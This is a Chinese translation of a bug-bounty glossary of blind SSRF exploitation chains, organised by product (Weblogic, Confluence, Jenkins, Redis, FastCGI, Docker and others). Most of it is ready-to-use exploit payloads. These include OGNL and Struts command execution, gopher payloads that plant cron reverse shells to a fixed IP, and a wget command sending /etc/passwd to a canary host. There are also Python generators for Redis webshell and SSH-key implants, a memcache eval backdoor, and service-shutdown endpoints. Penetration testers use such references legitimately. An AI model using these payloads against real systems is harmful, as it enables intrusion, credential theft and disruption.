盲SSRF利用鏈術語表
介紹
什么是服務器請求偽造(SSRF)?
SSRF(Server-Side Request Forgery:服務請求偽造)是一種由攻擊者構造,從而讓服務端發起請求的一種安全漏洞,它將一個可以發起網絡請求的服務當作跳板來攻擊其他服務,SSRF的攻擊目標一般是內網。當服務端提供了從其他服務器獲取數據的功能(如:從指定URL地址獲取網頁文本內容、加載指定地址的圖片、下載等),但是沒有對目標地址做過濾與限制時就會出現SSRF。
盲 SSRF(Blind SSRF)
在利用服務器端請求偽造時,我們經常會發現自己無法讀取響應。這種行為通常被稱為"盲SSRF(Blind SSRF)"。在這種情況下,我們如何證明影響?這是賈斯汀 · 加德納在推特上引發的一次有趣的討論:
如果你能夠獲得內部資源,那么可以執行許多潛在的利用鏈來證明其影響。這篇文章盡可能詳細介紹每個已知的盲SSRF的漏洞利用鏈,並將隨着更多技術的發現和分享而更新。
你可以在這里找到一個GitHub倉庫來查看所有的這些技術:Blind SSRF Chains。
請在GitHub上給我們發送一個pull請求,如果你想在這個術語表中添加更多的技術。
SSRF Canaries
(當在內部將一個盲SSRF鏈接到另一個SSRF時,我傾向於稱他們為SSRF Canaries,這將在外部進行額外調用,或者通過特定於應用程序的打開重定向或盲XXE。Confluence, Artifactory, Jenkins, 和JAMF都有一些很好的效果。)
為了驗證你可以與內部服務或應用程序交互,你可以使用“SSRF Canaries”。
此時,我們可以請求一個內部URL,該URL執行另一個SSRF並調用你的 Canaries主機。如果你收到一個到你的Canaries主機的請求,這意味着你已經成功地命中了一個內部服務,該服務也能夠發出出站請求。
這是驗證SSRF漏洞是否可以訪問內部網絡或應用程序的有效方法,也是驗證內部網絡上是否存在某些軟件的有效方法。你還可以使用SSRF檢測器訪問內部網絡中更敏感的部分,這取決於它位於何處。
使用DNS數據源和AltDNS查找內部主機
目標是找到盡可能多的內部主機,DNS數據源可以用來找到指向內部主機的所有記錄。
在雲環境中,我們經常看到指向內部VPC中的主機的elb。根據資產所在VPC的不同,有可能訪問同一VPC內的其他主機。
例如,假設從DNS數據源中發現了以下主機:
livestats.target.com -> internal-es-livestats-298228113.us-west-2.elb.amazonaws.com -> 10.0.0.82
你可以假設它代表Elasticsearch,然后對該主機執行進一步的攻擊。還可以在通過這種方法在已確定的所有“內部”主機上噴灑所有盲SSRF Payloads。這一般情況下是有效的。
要找到更多的內部主機,我建議使用所有的DNS數據,然后使用AltDNS之類的東西生成排列,然后使用fast DNS bruteforcer解析它們。
完成后,識別所有新發現的內部主機,並將它們作為盲SSRF鏈的一部分。
側信道泄露
當利用盲SSRF漏洞時,你可能會泄漏有關返回響應的一些信息。例如,假設你通過XXE盲打SSRF,則錯誤消息可能表示是否:
-
返回了一個響應:
Error parsing request: System.Xml.XmlException: Expected DTD markup was not found. Line 1, position 1. -
無法訪問主機和端口:
Error parsing request: System.Net.WebException: Unable to connect to the remote server -
響應狀態代碼:
Online internal asset:port responds with vs offline internal asset:port
200 OK``500 Internal Server Error -
響應內容:
響應大小(以字節為單位)是小還是大,取決於你試圖請求的URL是否可達。
-
響應時間:
響應時間變慢或變快,這取決於你試圖請求的URL是否可達。
技巧
可能通過HTTP (s)
Elasticsearch
默認端口: 9200
當內部部署Elasticsearch時,它通常不需要身份驗證。
如果你有一個盲SSRF,你可以確定狀態代碼,檢查看看以下端點是否返回200:
/_cluster/health
/_cat/indices
/_cat/health
如果你有一個可以發送POST請求的盲SSRF,你可以通過發送一個POST請求到以下路徑來關閉Elasticsearch實例:
注意:這個API已經從Elasticsearch版本2.x及以上中移除了。這只能在Elasticsearch 1.6和以下版本運行
/_shutdown
/_cluster/nodes/_master/_shutdown
/_cluster/nodes/_shutdown
/_cluster/nodes/_all/_shutdown
Weblogic
默認端口: 80, 443 (SSL), 7001, 7002, 8888
SSRF Canary: UDDI Explorer (CVE-2014-4210)
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
這也可以通過GET實現:
http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
這個端點也容易受到CRLF注入的影響:
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0
Host: vuln.weblogic
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close
將導致以下請求:
root@mail:~# nc -lvp 4000
Listening on [0.0.0.0] (family 0, port 4000)
Connection from example.com 43111 received!
POST /exp HTTP/1.11
X-CLRF: Injected HTTP/1.1
Content-Type: text/xml; charset=UTF-8
soapAction: ""
Content-Length: 418
User-Agent: Java1.6.0_24
Host: attacker.com:4000
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: Keep-Alive
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><env:Envelope xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><env:Header/><env:Body><find_business generic="2.0" xmlns="urn:uddi-org:api_v2"><name>sdf</name></find_business></env:Body></env:Envelope>
SSRF Canary: CVE-2020-14883
Taken from here.
Linux:
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")
Windows:
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
Hashicorp Consul
默認端口: 8500, 8501(SSL)
Writeup can be found here.
Shellshock
默認端口: 80, 443 (SSL), 8080
為了有效地測試Shellshock,你可能需要添加一個包含payload的頭。下面的CGI路徑值得一試:
要測試的CGI路徑列表:Gist containing paths.
SSRF Canary: Shellshock via User Agent
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
Apache Druid
默認端口: 80, 8080, 8888, 8082
請參閱Apache Druid的API參考。
如果你可以查看狀態碼,請檢查以下路徑,看看它們是否返回200狀態碼:
/status/selfDiscovered/status
/druid/coordinator/v1/leader
/druid/coordinator/v1/metadata/datasources
/druid/indexer/v1/taskStatus
關閉任務,需要你猜測任務id或數據源名稱:
/druid/indexer/v1/task/{taskId}/shutdown
/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks
Apache Druid Overlords上的關閉監控器:
/druid/indexer/v1/supervisor/terminateAll
/druid/indexer/v1/supervisor/{supervisorId}/shutdown
Apache Solr
默認端口: 8983
SSRF Canary: Shards Parameter
(為了補充shubham所說的--掃描solr相對容易。有一個shards=參數,允許你反彈SSRF到SSRF,用來驗證你正在盲打的solr實例)
取自這里。
/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
/xxx?q=aaa%26shards=http://SSRF_CANARY/solr
/xxx?q=aaa&shards=http://SSRF_CANARY/solr
SSRF Canary: Solr XXE (2017)
Apache Solr 7.0.1 XXE (Packetstorm)
/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'><a></a>'
/xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'><a></a>"}
通過dataImportHandlerRCE
Research on RCE via dataImportHandler
PeopleSoft
默認端口: 80,443 (SSL)
取自這個研究
SSRF Canary: XXE #1
POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<?xml version="1.0"?>
<!DOCTYPE IBRequest [
<!ENTITY x SYSTEM "http://SSRF_CANARY">
]>
<IBRequest>
<ExternalOperationName>&x;</ExternalOperationName>
<OperationType/>
<From><RequestingNode/>
<Password/>
<OrigUser/>
<OrigNode/>
<OrigProcess/>
<OrigTimeStamp/>
</From>
<To>
<FinalDestination/>
<DestinationNode/>
<SubChannel/>
</To>
<ContentSections>
<ContentSection>
<NonRepudiation/>
<MessageVersion/>
<Data><![CDATA[<?xml version="1.0"?>your_message_content]]>
</Data>
</ContentSection>
</ContentSections>
</IBRequest>
SSRF Canary: XXE #2
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
Apache Struts
默認端口: 80,443 (SSL),8080,8443 (SSL)
取自這里。
SSRF Canary: Struts2-016:
將這個附加到你知道的每個內部端點/URL的末尾:
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
JBoss
默認端口: 80,443 (SSL),8080,8443 (SSL)
取自這里:
SSRF Canary: Deploy WAR from URL
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
Confluence
默認端口: 80,443 (SSL),8080,8443 (SSL)
通過OGNL注入實現RCE (CVE-2021-26084)
/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/confluence/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/wiki/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/doenterpagevariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/createpage.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/templates2/viewpagetemplate.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/template/custom/content-editor?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/templates/editor-preload-container?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/users/user-dark-features?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
SSRF Canary: Sharelinks(2016年11月發布的Confluence版本及更早版本)
/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/
SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)
Atlassian Security Ticket OAUTH-344
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
Jira
默認端口: 80,443 (SSL),8080,8443 (SSL)
SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)
Atlassian Security Ticket OAUTH-344
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)
Atlassian Security Ticket JRASERVER-69793
/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
其他Atlassian產品
默認端口: 80,443 (SSL),8080,8443 (SSL)
SSRF Canary: iconUriServlet (CVE-2017-9506):
- Bamboo < 6.0.0
- Bitbucket < 4.14.4
- Crowd < 2.11.2
- Crucible < 4.3.2
- Fisheye < 4.3.2
Atlassian Security Ticket OAUTH-344
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
OpenTSDB
默認端口: 4242
SSRF Canary: curl via RCE
/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png
SSRF Canary: curl via RCE - CVE-2020-35476
/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
Jenkins
默認端口: 80,443 (SSL),8080,8888
取自這里。
SSRF Canary: CVE-2018-1000600
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai
RCE
按照這里的說明,通過GET實現RCE:黑客詹金斯第2部分-濫用元編程為未經驗證的RCE!
/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;
通過Groovy RCE
cmd = 'curl burp_collab'
pay = 'public class x {public x(){"%s".execute()}}' % cmd
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
Hystrix Dashboard
默認端口: 80,443 (SSL),8080
Spring Cloud Netflix,版本2.2.x 2.2.4之前的版本2.1.x 在2.1.6版本之前。
SSRF Canary: CVE-2020-5412
/proxy.stream?origin=http://SSRF_CANARY/
W3 Total Cache
默認端口: 80,443(SSL)
W3 Total Cache 0.9.2.6-0.9.3
SSRF Canary: CVE-2019-6715
這需要是PUT請求:
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host:
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}
SSRF Canary
關於此漏洞的建議發布在這里:W3 Total Cache SSRF漏洞
這個PHP代碼將為你的SSRF Canary主機生成一個payload(用你的Canary主機替換):url
<?php
$url='http://www.google.com';
$file=strtr(base64_encode(gzdeflate($url.'#https://ajax.googleapis.com')), '+/=', '-_');
$file=chop($file,'=');
$req='/wp-content/plugins/w3-total-cache/pub/minify.php?file='.$file.'.css';
echo($req);
?>
Docker
默認端口: 2375, 2376 (SSL)
如果你有一個部分回顯SSRF,你可以使用以下路徑來驗證Docker的API的存在:
/containers/json
/secrets
/services
通過運行一個任意的docker鏡像觸發RCE
POST /containers/create?name=test HTTP/1.1
Host: website.com
Content-Type: application/json
...
{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}
將alpine替換為你希望docker容器運行的任意鏡像。
Gitlab Prometheus Redis Exporter
默認端口: 9121
此漏洞影響13.1.1版本之前的Gitlab實例。根據Gitlab文檔,從Gitlab 9.0開始,Prometheus及其導出程序默認是打開的。
這些導出器為攻擊者使用CVE-2020-13379來攻擊其他服務提供了一種很好的方法。一個很容易被利用的Exporter是Redis Exporter。
以下端點將允許攻擊者轉儲redis服務器中通過target參數提供的所有密鑰:
http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
可能通過Gopher
Redis
默認端口: 6379
推薦閱讀:
通過Corn RCE - Gopher Attack Surfaces
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
Gopher:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
通過上傳(PHP)shell RCE - Redis Getshell Summary
#!/usr/bin/env python
# -*-coding:utf-8-*-
import urllib
protocol="gopher://"
ip="192.168.189.208"
port="6379"
shell="\n\n<?php phpinfo();?>\n\n"
filename="shell.php"
path="/var"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
通過 authorized_keys RCE - Redis Getshell Summary
import urllib
protocol="gopher://"
ip="192.168.189.208"
port="6379"
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
filename="authorized_keys"
path="/root/.ssh/"
passwd=""
cmd=["flushall",
"set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
通過Git協議在GitLab上進行RCE
參考Liveoverflow的文章
雖然這需要通過身份驗證訪問GitLab才能利用,我這里的payload,因為協議可能對你正在攻擊的目標有效。此payload僅供參考。
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
Memcache
默認端口: 11211
gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
Apache Tomcat
默認端口: 80,443 (SSL),8080,8443 (SSL)
僅對Tomcat 6有效:
使用此技術編寫CTF:
From XXE to RCE: Pwn2Win CTF 2018 Writeup
FastCGI
默認端口: 80,443 (SSL)
取自這里
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
工具
Gopherus
這個工具產生的Gopher payload有:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
SSRF Proxy
SSRF Proxy是一個多線程HTTP代理服務器,旨在通過容易受到服務器端請求偽造(SSRF)攻擊的HTTP服務器隧道客戶端HTTP流量。
Credits:
原文:A Glossary of Blind SSRF Chains – Assetnote
感謝以下為這篇文章做出貢獻的人:
- @Rhynorater - Numerous contributions towards this blog post
- @nnwakelam - Solr Shards SSRF
- @marcioalm - Tomcat 6 Gopher RCE
- @vtnahira - OpenTSDB RCE
- @fransrosen - SSRF canaries concept
- @theabrahack - RCE via Jenkins Groovy
- bike chain logo by Rafael Empinotti from the Noun Project